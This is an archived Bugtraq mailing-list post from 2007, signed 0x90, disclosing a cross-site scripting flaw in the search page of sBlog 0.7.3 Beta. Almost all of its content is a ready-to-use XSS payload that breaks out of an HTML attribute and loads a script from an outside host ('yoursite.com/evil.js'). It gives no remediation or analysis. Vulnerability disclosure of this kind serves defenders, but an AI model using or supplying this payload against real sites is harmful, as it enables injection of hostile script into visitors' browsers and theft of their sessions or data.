[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

sBlog 0.7.3 Beta XSS Vulnerabilitie

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: sBlog 0.7.3 Beta XSS Vulnerabilitie
From: Guns@xxxxxxxxxxx
Date: 26 Jul 2007 23:45:41 -0000

# sBlog 0.7.3 Beta  XSS Vulnerabilitie
# Found by 0x90
# www.0x90.com.ar
# msn & mail: Guns@xxxxxxxxxxx


# in blog
http://host/blog/search.php

# use

'"/></><script src=http://yoursite.com/evil.js>

# Welcome to the jungle!

Prev by Date: rPSA-2007-0149-1 bind bind-utils
Next by Date: rPSA-2007-0150-1 libvorbis
Previous by thread: rPSA-2007-0149-1 bind bind-utils
Next by thread: rPSA-2007-0150-1 libvorbis
Index(es):
- Date
- Thread